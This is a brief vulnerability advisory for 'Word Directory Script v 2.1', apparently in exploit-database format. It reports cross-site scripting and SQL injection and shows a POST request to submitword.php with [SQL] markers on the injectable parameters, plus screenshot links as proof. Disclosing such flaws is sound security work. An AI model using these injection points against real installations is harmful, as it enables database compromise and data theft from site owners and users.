################################################ #Title: Word Directory Script v 2.1 - Cross Site Scripting / SQL Injection #Credit: Bilal KARDADOU #Vendor: http://www.phponly.com/ #Vendor URL: http://www.phponly.com/words.html #Product: Word Directory Script v 2.1 #Google Dork: N/A ################################################ # # Product & Service Introduction: # # "Word Directory Script" # The big difference between this directory and the others, # is that this one has a user statistic where users can login and see how many hits their words have received. # This word directory offers you better features than any other. # Listings cannot be submitted until payment has been received. # # [POST/\Method] http://localhost/words/submitword.php # Data: name=[SQL]Tebi&client_mail=demo%40demo.com[SQL]&url=http%3A%2F% 2Fwww.google.com [SQL]&word=tebi&size=15[SQL]&is_bold=1&color=%230000FF&title=aaaaaa[SQL]&terms_accepted=1&buyword= # # PoC: # http://prntscr.com/evwcwr # http://prntscr.com/evwejp # # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################